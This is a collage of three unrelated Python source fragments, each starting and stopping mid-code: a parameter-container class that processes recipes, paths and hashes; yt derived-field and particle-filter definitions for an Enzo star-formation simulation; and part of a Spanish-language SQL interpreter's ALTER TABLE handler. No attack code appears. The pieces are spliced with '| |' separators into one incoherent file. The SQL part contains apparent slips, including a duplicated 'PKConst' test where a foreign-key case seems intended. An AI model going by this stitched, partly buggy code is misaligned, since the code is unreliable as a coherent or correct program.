parameters=parameters,
path=[section, 'PARAMETERS'],
new_value=copy.deepcopy(
self.get_path_translated(
parameters=parameters,
path=[section_method_parameters, parameters[section][self.field_labels['LABEL']]]
)
)
)
else:
message = '{name}: Invalid method for parameter field, {field}->method={method}'.format(
name=self.__class__.__name__,
field=section,
method=parameters[section][self.field_labels['LABEL']]
)
self.logger.exception(message)
raise ValueError(message)
# Inject parameters based on recipes
if self.field_labels['RECIPE'] in parameters[section]:
# Remove current parameters
self.set_path_translated(
parameters=parameters,
path=[section, 'PARAMETERS'],
new_value={}
)
for item in self.get_path_translated(parameters=parameters, path=[section, 'RECIPE']):
if self.field_labels['LABEL'] in item:
label = item[self.field_labels['LABEL']]
elif 'label' in item:
label = item['label']
method_parameters = self.get_path_translated(
parameters=parameters,
path=[section_method_parameters, label]
)
if method_parameters:
self.set_path_translated(
parameters=parameters,
path=[section, 'PARAMETERS', label],
new_value=method_parameters
)
else:
message = '{name}: Cannot find any parameters for the method in the recipe field, {field}->recipe={method}'.format(
name=self.__class__.__name__,
field=section,
method=label
)
self.logger.exception(message)
raise ValueError(message)
return self
def _translated_path(self, path):
"""Path translation, defined section_label is used as translation map.
Parameters
----------
path : list of str
Path parts
Returns
-------
list of str
Path parts with translation
"""
translated_path = []
for p in path:
if p in self.section_labels:
translated_path.append(self.section_labels.map(p))
elif p in self.field_labels:
translated_path.append(self.field_labels.map(p))
else:
translated_path.append(p)
return translated_path
def _prepare_paths(self, parameters):
"""Prepare paths
Parameters
----------
parameters : dict
Parameter dictionary
"""
if self.section_labels['PATH'] in parameters:
if platform.system() == 'Windows':
# Translate separators if in Windows
for path_key, path in iteritems(self.get_path_translated(parameters=parameters, path=['PATH'])):
if isinstance(path, str):
self.set_path_translated(
parameters=parameters,
path=['PATH', path_key],
new_value=Path(path).posix_to_nt()
)
elif isinstance(path, dict):
for path_key_sub, path_sub in iteritems(self.get_path_translated(parameters=parameters, path=['PATH', path_key])):
if isinstance(path_sub, str):
self.set_path_translated(
parameters=parameters,
path=['PATH', path_key, path_key_sub],
new_value=Path(path_sub).posix_to_nt()
)
# Translate paths to be absolute
if self.get_path_translated(parameters=parameters, path=['PATH', 'APPLICATION_PATHS']):
# Container has application paths
if self.get_path_translated(parameters=parameters, path=['PATH', 'APPLICATION_PATHS', 'BASE']):
# Container has application base path
base_path = self.get_path_translated(parameters=parameters, path=['PATH', 'APPLICATION_PATHS', 'BASE'])
if not os.path.isabs(base_path):
base_path = os.path.join(self.app_base, base_path)
self.set_path_translated(
parameters=parameters,
path=['PATH', 'APPLICATION_PATHS', 'BASE'],
new_value=base_path
)
else:
# No base path given, use main application base
base_path = self.app_base
# Extend rest of the application paths
for path_key, path in iteritems(self.get_path_translated(parameters=parameters, path=['PATH', 'APPLICATION_PATHS'])):
if path_key is not self.field_labels['BASE'] and not os.path.isabs(path):
path = os.path.join(base_path, path)
self.set_path_translated(
parameters=parameters,
path=['PATH', 'APPLICATION_PATHS', path_key],
new_value=path
)
if self.get_path_translated(parameters=parameters, path=['PATH', 'EXTERNAL_PATHS']):
# Container has external paths
for path_key, path in iteritems(self.get_path_translated(parameters=parameters, path=['PATH', 'EXTERNAL_PATHS'])):
if not os.path.isabs(path):
path = os.path.join(self.app_base, path)
self.set_path_translated(
parameters=parameters,
path=['PATH', 'EXTERNAL_PATHS', path_key],
new_value=path
)
def _process_application_paths(self, parameters, create_paths=True, create_parameter_hints=True):
"""Process application paths
Parameters
----------
parameters : dict
Parameter dictionary
create_paths : bool
Create paths
Default value True
create_parameter_hints : bool
Create parameters files to all data folders
Default value True
"""
# Make sure extended paths exists before saving parameters in them
if create_paths:
# Create paths
paths = self.get_path_translated(
parameters=parameters,
path=['PATH']
)
if paths:
for path_key, path in iteritems(paths):
if isinstance(path, str):
Path().create(path)
elif isinstance(path, dict):
for path_key_sub, path_sub in iteritems(self.get_path_translated(parameters=parameters, path=['PATH', path_key])):
if isinstance(path_sub, str):
Path().create(path_sub)
# Check path_structure
app_paths = self.get_path_translated(
parameters=parameters,
path=['PATH', 'APPLICATION_PATHS']
)
if app_paths:
# Application paths are used
for field, structure in iteritems(self.path_structure):
if field in app_paths:
if self.field_labels['BASE'] in app_paths:
path_base = os.path.join(
app_paths[self.field_labels['BASE']],
app_paths[field]
)
else:
path_base = os.path.join(
self.app_base,
app_paths[field]
)
# Generate full path with parameter hashes
path = ApplicationPaths(
parameter_container=parameters
).generate(
path_base=path_base,
structure=structure
)
# Check for path limitations
if platform.system() == 'Windows':
if isinstance(path, dict):
for key, p in iteritems(path):
if len(p) >= 255:
message = '{name}: Path potentially exceeds Windows path length limit (255) [{path}]'.format(
name=self.__class__.__name__,
path=p
)
self.logger.warning(message)
# Create directories
if create_paths:
Path().create(paths=path)
# Create parameter hints
if create_parameter_hints:
ApplicationPaths(
parameter_container=parameters
).save_parameters_to_path(
path_base=path_base,
structure=structure,
parameter_filename=self.application_directory_parameter_filename
)
# Update path in the container
self.set_path_translated(
parameters=parameters,
path=['PATH', 'APPLICATION_PATHS', field],
new_value=path
)
def _add_hash_to_main_parameters(self, parameters):
"""Add has to the main sections.
Parameters
----------
parameters : dict
Parameter dictionary
"""
for field, params in iteritems(parameters):
if isinstance(params, dict):
if field not in self.non_hashable_sections and parameters[field]:
parameters[field]['_hash'] = self.get_hash(
data=parameters[field]
)
def _add_hash_to_method_parameters(self, parameters):
"""Add has to the method parameter sections.
Parameters
----------
parameters : dict
Parameter dictionary
"""
for field in parameters:
if field.endswith('_' + self.field_labels['METHOD_PARAMETERS']):
for key, params in iteritems(parameters[field]):
if params and isinstance(params, dict):
params['_hash'] = self.get_hash(
data=params
)
def _add_main_hash(self, parameters):
"""Add main level hash.
Parameters
----------
parameters : dict
Parameter dictionary
"""
data = {}
for field, params in iteritems(parameters):
if isinstance(params, dict):
if field not in self.non_hashable_sections and parameters[field]:
data[field] = self.get_hash(
data=parameters[field]
)
parameters['_hash'] = self.get_hash(
data=data
)
def _after_load(self, to_return=None):
"""Method triggered after parameters have been loaded."""
self.processed = False
def _clean_unused_parameters(self):
"""Remove unused parameters from the parameter dictionary."""
for field in list(self.keys()):
if field.endswith('_method_parameters'):
del self[field]
def _convert_main_level_to_containers(self, parameters):
"""Convert main level sections to DictContainers.
Parameters
----------
parameters : dict
Parameter dictionary
"""
for key, item in iteritems(parameters):
if isinstance(item, dict) and self.field_labels['PARAMETERS'] in item:
item[self.field_labels['PARAMETERS']] = DictContainer(item[self.field_labels['PARAMETERS']])
if isinstance(item, dict):
parameters[key] = DictContainer(item)
def _method_parameter_section(self, section, parameters):
"""Get section name for method parameters.
Parameters
----------
section : str
Section name
parameters : dict
Parameter dictionary
Returns
-------
str
"""
# Get LABEL for section
section_label_map = OneToOneMappingContainer(self.section_labels)
section_translation_label = section_label_map.flipped.map(section)
# Test a few patterns to find method parameter section
# Test pattern [LABEL + METHOD_PARAMETERS]
method_parameter_section = section + '_' + self.field_labels['METHOD_PARAMETERS']
if method_parameter_section not in parameters:
if section_translation_label:
# Test mapped [LABEL + '_METHOD_PARAMETERS']
method_parameter_section = section_label_map.map(section_translation_label + '_METHOD_PARAMETERS')
if method_parameter_section not in parameters:
# Test mapped [LABEL + '_PARAMETERS']
method_parameter_section = section_label_map.map(section_translation_label + '_PARAMETERS')
if method_parameter_section not in parameters:
# No fitting method parameter section found
method_parameter_section = None
else:
method_parameter_section = None
return method_parameter_section
def update_parameter_set(self, set_id):
"""Update active parameter set
Parameters
----------
set_id : str
Set id used in set list
Raises
------
ValueError:
No valid set id given
Returns
-------
self
"""
current_active_set = ListDictContainer(self[self.field_labels['SET-LIST']]).search(
key=self.field_labels['SET-ID'],
value=self[self.field_labels['ACTIVE-SET']]
)
new_active_set = ListDictContainer(self[self.field_labels['SET-LIST']]).search(
key=self.field_labels['SET-ID'],
value=set_id
)
if not new_active_set:
message = '{name}: No valid set given [{set_name}]'.format(
name=self.__class__.__name__,
set_name=set_id
)
self.logger.exception(message)
raise ValueError(message)
# Clean up main level from old sections
for section in current_active_set:
if section in self:
del self[section]
# Update parameters
self.merge(override=new_active_set)
# Set new active set
self[self.field_labels['ACTIVE-SET']] = set_id
return self
def set_ids(self):
"""Get set ids
Returns
-------
list
"""
if self.field_labels['SET-LIST'] in self:
set_ids = []
for set_id, set_defined_parameters in enumerate(self[self.field_labels['SET-LIST']]):
if self.field_labels['SET-ID'] in set_defined_parameters:
set_ids.append(
set_defined_parameters[self.field_labels['SET-ID']]
)
return sorted(set_ids)
else:
return None
def set_id_exists(self, set_id):
"""Set id exists
Parameters
----------
set_id : str
Parameter set id
Returns
-------
bool
"""
if set_id in self.set_ids():
return True
else:
return False
| |
*\
(l == data.ds.parameters['MaximumRefinementLevel']))
return answer
def _above_chiaki_threshold(field,data):
C_f = data[('gas','C_Fraction')].value
Fe_f = data[('gas','Fe_Fraction')].value
H_f = data[('gas','H_fraction')].value
return physics.chiaki_threshold(C_f, Fe_f, H_f, return_value=False).astype(np.float64)
def _chiaki_value(field,data):
C_f = data[('gas','C_Fraction')].value
Fe_f = data[('gas','Fe_Fraction')].value
H_f = data[('gas','H_fraction')].value
return physics.chiaki_threshold(C_f, Fe_f, H_f, return_value=True)
yt.add_field(("gas","a_rad"), sampling_type = 'cell',function=_rad_accel, units="cm/s**2")
yt.add_field(('index','DM_background_density'), sampling_type = 'cell',function = _dm_density, units = 'g/cm**3')
yt.add_field(('index','DM_background_potential'), sampling_type = 'cell',function = _dm_potential, units = 'erg/g')
yt.add_field(('index','magnitude_cylindrical_radius'), sampling_type = 'cell',function = _mag_cyl_r, units = 'cm')
yt.add_field(('index','magnitude_cylindrical_z'),sampling_type = 'cell', function = _mag_cyl_z, units = 'cm')
# def _H2_total_mass(field, data):
# mass = data[('gas',
yt.add_field(('gas','Pe_heating_rate'),sampling_type = 'cell', function = _pe_heating_cgs, units = 'erg/s/cm**3')
yt.add_field(('gas','H_total_mass'), sampling_type = 'cell',function = _H_total_mass, units ='g')
yt.add_field(('gas','H_Mass'),sampling_type = 'cell', function = _H_total_mass, units = 'g') # define as same
yt.add_field(('gas','He_total_mass'), sampling_type = 'cell',function = _He_total_mass, units = 'g')
yt.add_field(('gas','metal_mass'), sampling_type = 'cell',function = _metal_total_mass, units = 'g')
yt.add_field(('gas','OTLW_kdissH2I'), sampling_type = 'cell',function = _otlwcgs, units = '1/s',
validators=ValidateDataField(('enzo','OTLW_kdissH2I')))
yt.add_field(('gas','LW_flux'), sampling_type = 'cell',function = _LW_flux, units = "erg/s/cm**2",
validators=ValidateDataField(('enzo','OTLW_kdissH2I')))
yt.add_field(('gas','above_chiaki_threshold'), sampling_type = 'cell',function = _above_chiaki_threshold,
units="")
yt.add_field(('gas','chiaki_value'),sampling_type = 'cell', function = _chiaki_value,
units="")
yt.add_field(('gas','is_star_forming'),sampling_type = 'cell', function = _is_star_forming,
units = "")
yt.add_field(('gas','Pe_heating_rate_masked'),sampling_type = 'cell', function = _pe_heating_rate_masked, units='erg/s/cm**3')
yt.add_field(('gas','G_o'), sampling_type = 'cell',function = _G_o, units = "")
yt.add_field(('gas','G_eff'), sampling_type = 'cell',function = _G_eff, units = "")
yt.add_field(('gas','FUV_flux'), sampling_type = 'cell',function = _FUV_flux, units = "erg/s/cm**2")
yt.add_field(('gas','Q0_flux'),sampling_type = 'cell', function = _Q0_flux, units = "erg/s/cm**2")
yt.add_field(('gas','Q1_flux'),sampling_type = 'cell', function = _Q1_flux, units = "erg/s/cm**2")
# yt.add_field(('gas','H2_total_mass'), function = _H2_total_mass, units = 'g')
# yt.add_field(('gas','All_H_total_mass'), function = _all_H_total_mass, units = 'g')
if (('enzo','PotentialField') in fields) or (('enzo', 'GravPotential') in fields) or (('enzo','Grav_Potential') in fields):
yt.add_field(('gas','pos_gravitational_potential'), sampling_type = 'cell',function=_grav_pot, units = 'erg/g')
yt.add_field(('gas','gas_gravitational_potential'), sampling_type = 'cell',function=_gas_grav_pot, units = 'erg/g')
yt.add_field(('gas','total_gravitational_potential'),sampling_type = 'cell', function=_tot_grav_pot, units = 'erg/g')
yt.add_field(('gas','pos_total_gravitational_potential'), sampling_type = 'cell',function=_pos_tot_grav_pot, units = 'erg/g')
yt.add_field(('gas','potential_energy'),sampling_type = 'cell', function=_potential_energy, units = 'erg')
yt.add_field(('gas','gravitationally_bound'), sampling_type = 'cell',function=_grav_bound, units = "")
nfields = 5
return nfields
def generate_derived_fields(ds):
"""
Given a data set (to extract the on-disk field names), generate
derived fields that will persist for the python session (i.e. not
tied only to the passed data set).
Right now, takes in all metal species tracer fields and constructs
fields for their mass fraction, number density, and all possible
interesting abundance ratios.
NOTE: The derived fields will only exist for data sets loaded after
this function call. If analysis is intended for passed data set,
it will need to be reloaded for fields to exist.
"""
fields = ds.field_list
# lets figure out the metal tracers present
metals = utilities.species_from_fields(fields)
ratios = utilities.ratios_list(metals)
print("defining for the following metals ", metals)
# make new functions to do correct units for species fields
_density_function_generator(metals + ['Metal'])
print("tracer species present: ", metals)
nfields = _mass_function_generator(metals)
print(nfields, "mass fields defined")
nfields = _mass_fraction_function_generator(ds, metals)
print(nfields, "mass fraction fields defined")
nfields = _number_density_function_generator(metals)
print(nfields, "number density fields defined")
if not (ionization._ion_table is None):
nfields = _ionization_state_generator(metals)
print(nfields, "ionization state fields defined")
nfields = _abundance_ratio_function_generator(ratios, metals, H_mode = 'total')
print(nfields, "abundance ratio fields defined")
nfields = _abundance_function_generator(metals)
if ds.parameters['NumberOfParticles'] > 0:
if ('all','particle_' + metals[0] + '_fraction') in ds.field_list:
nfields = _particle_abundance_ratio_function_generator(ratios, ds)
print(nfields, "particle abundance ratio fields defined")
_particle_abundance_function_generator(metals, ds)
generate_stellar_model_fields(ds)
nfields = _additional_helper_fields(fields)
print(nfields, "additional helper fields defined")
#generate_grackle_fields(ds)
FIELDS_DEFINED = True
return
def load_and_define(name):
"""
Wrapper around yt to load a data set and define gradient
fields and particle filters which must be defined for each
simulation file separately (unlike the above)
"""
ds = yt.load(name)
if not FIELDS_DEFINED:
generate_derived_fields(ds)
ds = yt.load(name)
generate_derived_fields(ds)
gradient_available = generate_gradient_fields(ds)
if gradient_available:
def _grav_accel_x(field,data):
return data[('gas','gas_gravitational_potential_gradient_x')].to('cm/s**2')
def _grav_accel_y(field,data):
return data[('gas','gas_gravitational_potential_gradient_y')].to('cm/s**2')
def _grav_accel_z(field,data):
return data[('gas','gas_gravitational_potential_gradient_z')].to('cm/s**2')
def _grav_accel(field,data):
return np.sqrt(data[('gas','a_grav_x')]**2 + data[('gas','a_grav_y')]**2 + data[('gas','a_grav_z')]**2)
def _a_rad_a_grav(field,data):
a = data[('gas','a_rad')] / data[('gas','a_grav')]
a[data[('gas','a_grav')] == 0.0] = 0.0
return a
ds.add_field(('gas','a_grav_x'), function = _grav_accel_x, units = 'cm/s**2', sampling_type='cell')
ds.add_field(('gas','a_grav_y'), function = _grav_accel_y, units = 'cm/s**2', sampling_type='cell')
ds.add_field(('gas','a_grav_z'), function = _grav_accel_z, units = 'cm/s**2', sampling_type='cell')
ds.add_field(('gas','a_grav'), function = _grav_accel, units = 'cm/s**2', sampling_type='cell')
ds.add_field(('gas','a_rad_over_a_grav'), function = _a_rad_a_grav, units = '', sampling_type = 'cell')
#generate_particle_filters(ds)
#generate_grackle_fields(ds)
return ds
def load(name):
return load_and_define(name)
def generate_grackle_fields(ds):
if not GRACKLE_IMPORTED:
print("Grackle's python wrapper (pygrackle) was not imported successfully")
if ds.parameters['use_grackle']:
_grackle_fields(ds)
return
def generate_gradient_fields(ds):
"""
generate gas self gravity gradient fields and rename them to
something sensible
"""
if ("gas","gas_gravitational_potential") in ds.derived_field_list:
ds.add_gradient_fields(("gas","gas_gravitational_potential"))
gradient_available = True
else:
gradient_available = False
return gradient_available
def generate_particle_filters(ds):
"""
Make filter definitions for the various particle types:
Main Sequence :
White Dwarf :
SNIa remnant :
SNII remnant :
AGB phase (likely very few or none since short lived) :
"""
@yt.particle_filter(requires=["particle_type"], filtered_type='all')
def all_stars(pfilter, data):
filter = data[(pfilter.filtered_type, "particle_type")] >= 11
return filter
@yt.particle_filter(requires=["particle_type"], filtered_type='all_stars')
def all_popIII_stars(pfilter, data):
filter = data[(pfilter.filtered_type,"particle_is_popiii")].astype(np.bool)
return filter
@yt.particle_filter(requires=["particle_type"], filtered_type='all_stars')
def all_popII_stars(pfilter, data):
filter = np.logical_not(data[(pfilter.filtered_type,"particle_is_popiii")])
return filter
@yt.particle_filter(requires=["particle_type"], filtered_type='all_stars')
def main_sequence_stars(pfilter, data):
filter = (data[(pfilter.filtered_type, "particle_type")] == 11) +\
(data[(pfilter.filtered_type, "particle_type")] == 15)
return filter
@yt.particle_filter(requires=["particle_type"], filtered_type='all_stars')
def main_sequence_popIII_stars(pfilter, data):
filter = data[(pfilter.filtered_type, "particle_type")] == 14
return filter
@yt.particle_filter(requires=["particle_type"], filtered_type='all_stars')
def remnant_stars(pfilter, data):
filter = data[(pfilter.filtered_type, "particle_type")] == 13
return filter
@yt.particle_filter(requires=["particle_type",'birth_mass'], filtered_type='all_stars')
def low_mass_stars(pfilter, data):
filter = data[(pfilter.filtered_type, "particle_type")] == 11
filter = filter * (data[(pfilter.filtered_type,"birth_mass")] > 2.0) * (data[(pfilter.filtered_type,"birth_mass")] < 8.0)
return filter
@yt.particle_filter(requires=["particle_type",'birth_mass'], filtered_type='all_stars')
def low_mass_unresolved_stars(pfilter, data):
filter = data[(pfilter.filtered_type, "particle_type")] == 15
return filter
@yt.particle_filter(requires=["particle_type",'birth_mass'], filtered_type='all_stars')
def white_dwarf(pfilter, data):
filter = data[(pfilter.filtered_type, "particle_type")] == 12
return filter
ds.add_particle_filter('main_sequence_stars')
ds.add_particle_filter('remnant_stars')
ds.add_particle_filter('low_mass_stars')
ds.add_particle_filter('low_mass_unresolved_stars')
ds.add_particle_filter("white_dwarf")
ds.add_particle_filter('main_sequence_popIII_stars')
ds.add_particle_filter("all_popII_stars")
ds.add_particle_filter("all_popIII_stars")
ds.add_particle_filter("all_stars")
#
#
# End of life filteres for non-snia
#
#
@yt.particle_filter(requires=['particle_type','birth_mass'], filtered_type='all_stars')
def all_remnants(pfilter, data):
filter = data[(pfilter.filtered_type,"particle_type")] == 13
return filter
@yt.particle_filter(requires=['particle_type','birth_mass'], filtered_type='all_remnants')
def popIII_remnant(pfilter, data):
if ('IndividualStarPopIIIFormation' in data.ds.parameters) and\
('PopIIIMetalCriticalFraction' in data.ds.parameters):
if data.ds.parameters['IndividualStarPopIIIFormation'] > 0:
if data.ds.parameters['PopIIIMetalCriticalFraction'] > 0:
filter = data[(pfilter.filtered_type,'metallicity_fraction')] < data.ds.parameters['PopIIIMetalCriticalFraction']
else: # use the Chiaki threshold:
filter = np.logical_not( data[(pfilter.filtered_type,'particle_above_chiaki_threshold')] )
else:
filter = np.logical_not(data[(pfilter.filtered_type, "birth_mass")] == data[(pfilter.filtered_type, "birth_mass")])
return filter
@yt.particle_filter(requires=['particle_type','birth_mass'], filtered_type='all_remnants')
def popIII_ccsne_remnant(pfilter, data):
if ('IndividualStarPopIIIFormation' in data.ds.parameters) and\
('PopIIIMetalCriticalFraction' in data.ds.parameters):
if data.ds.parameters['IndividualStarPopIIIFormation'] > 0:
if data.ds.parameters['PopIIIMetalCriticalFraction'] > 0:
filter = data[(pfilter.filtered_type,'metallicity_fraction')] < data.ds.parameters['PopIIIMetalCriticalFraction']
else: # use the Chiaki threshold:
filter = np.logical_not( data[(pfilter.filtered_type,'particle_above_chiaki_threshold')] )
filter = filter * ((data[(pfilter.filtered_type,'birth_mass')] >= ds.parameters['TypeIILowerMass']) *\
(data[(pfilter.filtered_type,'birth_mass')] <= ds.parameters['TypeIIUpperMass']))
else:
filter = np.logical_not(data[(pfilter.filtered_type, "birth_mass")] == data[(pfilter.filtered_type, "birth_mass")])
return filter
@yt.particle_filter(requires=['particle_type','birth_mass'], filtered_type='all_remnants')
def popIII_pisne_remnant(pfilter, data):
if ('IndividualStarPopIIIFormation' in data.ds.parameters) and\
('PopIIIMetalCriticalFraction' in data.ds.parameters):
if data.ds.parameters['IndividualStarPopIIIFormation'] > 0:
if data.ds.parameters['PopIIIMetalCriticalFraction'] > 0:
filter = data[(pfilter.filtered_type,'metallicity_fraction')] < data.ds.parameters['PopIIIMetalCriticalFraction']
else: # use the Chiaki threshold:
filter = np.logical_not( data[(pfilter.filtered_type,'particle_above_chiaki_threshold')] )
filter = filter * ((data[(pfilter.filtered_type,'birth_mass')] >= ds.parameters['PISNLowerMass']) *\
(data[(pfilter.filtered_type,'birth_mass')] <= ds.parameters['PISNUpperMass']))
else:
filter = np.logical_not(data[(pfilter.filtered_type, "birth_mass")] == data[(pfilter.filtered_type, "birth_mass")])
return filter
@yt.particle_filter(requires=['particle_type','birth_mass'], filtered_type='all_remnants')
def popIII_direct_collapse_remnant(pfilter, data):
if ('IndividualStarPopIIIFormation' in data.ds.parameters) and\
('PopIIIMetalCriticalFraction' in data.ds.parameters):
if data.ds.parameters['IndividualStarPopIIIFormation'] > 0:
if data.ds.parameters['PopIIIMetalCriticalFraction'] > 0:
filter = data[(pfilter.filtered_type,'metallicity_fraction')] < data.ds.parameters['PopIIIMetalCriticalFraction']
else: # use the Chiaki threshold:
filter = np.logical_not( data[(pfilter.filtered_type,'particle_above_chiaki_threshold')] )
filter = filter * (np.logical_not((data[(pfilter.filtered_type,'birth_mass')] >= ds.parameters['PISNLowerMass']) *\
(data[(pfilter.filtered_type,'birth_mass')] <= ds.parameters['PISNUpperMass'])) *\
np.logical_not((data[(pfilter.filtered_type,'birth_mass')] >= ds.parameters['TypeIILowerMass']) *\
(data[(pfilter.filtered_type,'birth_mass')] <= ds.parameters['TypeIIUpperMass'])))
else:
filter = np.logical_not(data[(pfilter.filtered_type, "birth_mass")] == data[(pfilter.filtered_type, "birth_mass")])
return filter
@yt.particle_filter(requires=["particle_type",'birth_mass'], filtered_type='all_remnants')
def ccsne_remnant(pfilter, data):
filter = ((data[(pfilter.filtered_type, "birth_mass")] <= data.ds.parameters['IndividualStarDirectCollapseThreshold']) *\
(data[(pfilter.filtered_type, "birth_mass")] >= data.ds.parameters['IndividualStarAGBThreshold']))
if ('IndividualStarPopIIIFormation' in data.ds.parameters) and\
('PopIIIMetalCriticalFraction' in data.ds.parameters):
if data.ds.parameters['IndividualStarPopIIIFormation'] > 0:
if data.ds.parameters['PopIIIMetalCriticalFraction'] > 0:
filter = filter * data[(pfilter.filtered_type,'metallicity_fraction')] < data.ds.parameters['PopIIIMetalCriticalFraction']
else: # use the Chiaki threshold:
filter = filter * data[(pfilter.filtered_type,'particle_above_chiaki_threshold')].astype(np.bool)
return filter
@yt.particle_filter(requires=["particle_type",'birth_mass'], filtered_type='all_remnants')
def direct_collapse_remnant(pfilter, data):
filter = data[(pfilter.filtered_type, "birth_mass")] > data.ds.parameters['IndividualStarDirectCollapseThreshold']
if ('IndividualStarPopIIIFormation' in data.ds.parameters) and\
('PopIIIMetalCriticalFraction' in data.ds.parameters):
if data.ds.parameters['IndividualStarPopIIIFormation'] > 0:
if data.ds.parameters['PopIIIMetalCriticalFraction'] > 0:
filter = filter * data[(pfilter.filtered_type,'metallicity_fraction')] < data.ds.parameters['PopIIIMetalCriticalFraction']
else: # use the Chiaki threshold:
filter = filter * data[(pfilter.filtered_type,'particle_above_chiaki_threshold')].astype(np.bool)
return filter
ds.add_particle_filter('all_remnants')
ds.add_particle_filter('popIII_ccsne_remnant')
ds.add_particle_filter('popIII_pisne_remnant')
ds.add_particle_filter('ccsne_remnant')
ds.add_particle_filter('direct_collapse_remnant')
ds.add_particle_filter('popIII_direct_collapse_remnant')
#
# this is the same as selecting for WD's
#
#@yt.particle_filter(requires=["particle_type",'birth_mass'], filtered_type='all_stars')
#def agb_remnant(pfilter, data):
# filter = data[(pfilter.filtered_type, "particle_type")] == 12
#
# filter = filter * ( (data[(pfilter.filtered_type,'birth_mass')] >= data.ds.parameters['IndividualStarWDMinimumMass']) *
# (data[(pfilter.filtered_type,'birth_mass')] <= data.ds.parameters['IndividualStarWDMaximumMass']))
# return filter
#ds.add_particle_filter("agb_remnant")
#
#
# SNIa particle filters
#
#
@yt.particle_filter(requires=["particle_type",'birth_mass','snia_sch_metal_fraction','snia_sds_metal_fraction',
'snia_hers_metal_fraction',
'snia_metal_fraction'], filtered_type='all_stars')
def | |
else:
TRef.alterField(DB_ACTUAL.getName(), self.tabla, subaccion.campo, 'Null', False)
elif isinstance(self.accion, AlterTableDrop):
if self.accion.tipo == ALTER_TABLE_DROP.COLUMN:
sint = self.accion.ejecutar(ts)
#Comprobamos la existencia del campo
if not TRef.columnExist(DB_ACTUAL.getName(),self.tabla,self.accion.nombre):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_syntax_error_or_access_rule_violation.undefined_column), 0)
dropField = TRef.alterDropColumn(DB_ACTUAL.getName(), self.tabla, sint)
if dropField == 1:
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_data_exception.data_exception), 0)
elif dropField == 4:
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_integrity_constraint_violation.integrity_constraint_violation), 0)
elif dropField == 6:
return ErrorReport('Semantico', 'Error: A table cannot be empty', 0)
else:
if not TRef.constraintExist(DB_ACTUAL.getName(),self.accion.nombre):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_integrity_constraint_violation.integrity_constraint_violation), 0)
colPres = TRef.getConstraint(DB_ACTUAL.getName(),self.tabla, self.accion.nombre)
if not isinstance(colPres, tuple):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_data_exception.data_exception), 0)
TRef.alterField(DB_ACTUAL.getName(), self.tabla, colPres[0], colPres[1], None)
if colPres[1] == 'PKConst':
TRef.alterField(DB_ACTUAL.getName(), self.tabla, colPres[0], 'PK', False)
DBMS.alterDropPK(DB_ACTUAL.getName(), self.tabla)
DBMS.alterAddPK(DB_ACTUAL.getName(), self.tabla, TRef.getIndexPK(DB_ACTUAL.getName(), self.tabla))
elif colPres[1] == 'PKConst':
TRef.alterField(DB_ACTUAL.getName(), self.tabla, colPres[0], 'FK', False)
TRef.alterField(DB_ACTUAL.getName(), self.tabla, colPres[0], 'References', None)
elif colPres[1] == 'UniqueConst':
TRef.alterField(DB_ACTUAL.getName(), self.tabla, colPres[0], 'Unique', False)
else:
TRef.alterField(DB_ACTUAL.getName(), self.tabla, colPres[0], 'Check', None)
elif isinstance(self.accion, AlterTableAdd):
colSint = self.accion.ejecutar(ts)
if isinstance(colSint, ErrorReport):
return colSint
if self.accion.tipo == ALTER_TABLE_ADD.COLUMN:
if TRef.columnExist(DB_ACTUAL.getName(), self.tabla, self.accion.nombre):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_syntax_error_or_access_rule_violation.duplicate_column), 0)
tipo = None
largo = None
if isinstance(self.accion.accion, tuple):
tipo = self.accion.accion[0].value
if isinstance(self.tipo[1],tuple):
largo = {'Precision': self.accion.accion[1][0],'Scale': self.accion.accion[1][1]}
else:
largo = self.accion.accion[1]
elif isinstance(self.accion.accion, str):
tipo = self.accion.accion
else:
tipo = self.accion.accion.value
atributos = dict(
{
"Type": tipo,
"Lenght": largo,
"Default": None,
"Null": True,
"PK": False,
"PKConst": None,
"FK": False,
"References": None,
"FKConst": None,
"Unique": False,
"UniqueConst": None,
"Check": None,
"CheckConst": None
}
)
TRef.alterAddColumn(DB_ACTUAL.getName(), self.tabla, self.accion.nombre, atributos)
DBMS.alterAddColumn(DB_ACTUAL.getName(), self.tabla, None)
elif self.accion.tipo == ALTER_TABLE_ADD.FOREIGN_KEY:
if not TRef.columnExist(DB_ACTUAL.getName(),self.tabla,colSint[0]):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_syntax_error_or_access_rule_violation.invalid_column_reference),0)
elif TRef.getColumns(DB_ACTUAL.getName(),self.tabla)[colSint[0]]['Type'] != TRef.getColumns(DB_ACTUAL.getName(),colSint[1])[colSint[2]]['Type']:
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_fdw_error.fdw_invalid_data_type), 0)
TRef.alterAddFK(DB_ACTUAL.getName(),self.tabla,colSint[0],{'Table':colSint[1],'Field':colSint[2]})
TRef.alterField(DB_ACTUAL.getName(),self.tabla,colSint[0],'FKConst',colSint[3])
elif self.accion.tipo == ALTER_TABLE_ADD.MULTI_FOREIGN_KEY:
# Procesamos por columna
for i in range(len(colSint)):
if not TRef.columnExist(DB_ACTUAL.getName(),self.tabla,colSint[i][0]):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_syntax_error_or_access_rule_violation.invalid_column_reference),0)
elif TRef.getColumns(DB_ACTUAL.getName(),self.tabla)[colSint[i][0]]['Type'] != TRef.getColumns(DB_ACTUAL.getName(),colSint[i][1])[colSint[i][2]]['Type']:
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_fdw_error.fdw_invalid_data_type), 0)
TRef.alterAddFK(DB_ACTUAL.getName(),self.tabla,colSint[i][0],{'Table':colSint[i][1],'Field':colSint[i][2]})
elif self.accion.tipo == ALTER_TABLE_ADD.CHECKS:
auxCols = TRef.getColumns(DB_ACTUAL.getName(),self.tabla)
if not colSint[0] in auxCols:
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_syntax_error_or_access_rule_violation.invalid_column_reference), 0)
auxCols[colSint[0]]['Check'] = colSint[0] + ' != ' + colSint[1]
else:
